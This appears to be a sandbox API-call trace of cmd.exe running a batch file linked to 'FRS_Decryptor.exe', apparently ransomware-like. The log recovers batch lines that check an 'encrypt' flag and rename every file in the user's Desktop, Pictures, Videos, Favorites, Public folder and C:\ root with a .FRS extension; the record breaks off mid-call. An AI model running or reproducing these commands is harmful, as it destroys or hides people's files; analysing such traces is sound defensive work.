dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0107.134] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0107.134] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0107.135] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0107.135] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0107.135] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] GetFileType (hFile=0x24c) returned 0x1 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0107.135] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0107.135] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] GetFileType (hFile=0x24c) returned 0x1 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0107.135] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0107.135] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0107.135] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.135] GetFileType (hFile=0x24c) returned 0x1 [0107.135] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0107.135] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.136] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.136] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.136] GetFileType (hFile=0x24c) returned 0x1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.136] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0107.136] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0107.136] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.136] GetFileType (hFile=0x24c) returned 0x1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0107.136] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0107.136] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0107.136] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.136] GetFileType (hFile=0x24c) returned 0x1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0107.136] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0107.136] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0107.136] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.136] GetFileType (hFile=0x24c) returned 0x1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0107.136] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0107.136] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0107.136] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0107.137] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.137] GetFileType (hFile=0x24c) returned 0x1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0107.137] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0107.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0107.137] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.137] GetFileType (hFile=0x24c) returned 0x1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0107.137] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0107.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0107.137] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.137] GetFileType (hFile=0x24c) returned 0x1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0107.137] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0107.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0107.137] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.137] GetFileType (hFile=0x24c) returned 0x1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0107.137] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0107.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0107.137] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.137] GetFileType (hFile=0x24c) returned 0x1 [0107.137] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0107.138] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0107.138] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0107.138] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.138] GetFileType (hFile=0x24c) returned 0x1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0107.138] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0107.138] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0107.138] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.138] GetFileType (hFile=0x24c) returned 0x1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0107.138] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0107.138] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0107.138] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.138] GetFileType (hFile=0x24c) returned 0x1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0107.138] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0107.138] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0107.138] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0107.138] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.138] GetFileType (hFile=0x24c) returned 0x1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0107.139] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0107.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0107.139] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.139] GetFileType (hFile=0x24c) returned 0x1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0107.139] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0107.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0107.139] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.139] GetFileType (hFile=0x24c) returned 0x1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0107.139] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0107.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0107.139] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.139] GetFileType (hFile=0x24c) returned 0x1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0107.139] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0107.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0107.139] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.139] GetFileType (hFile=0x24c) returned 0x1 [0107.139] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0107.139] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0107.140] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0107.140] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.140] GetFileType (hFile=0x24c) returned 0x1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0107.140] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0107.140] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0107.140] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.140] GetFileType (hFile=0x24c) returned 0x1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0107.140] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0107.140] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0107.140] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.140] GetFileType (hFile=0x24c) returned 0x1 [0107.140] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0107.140] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, 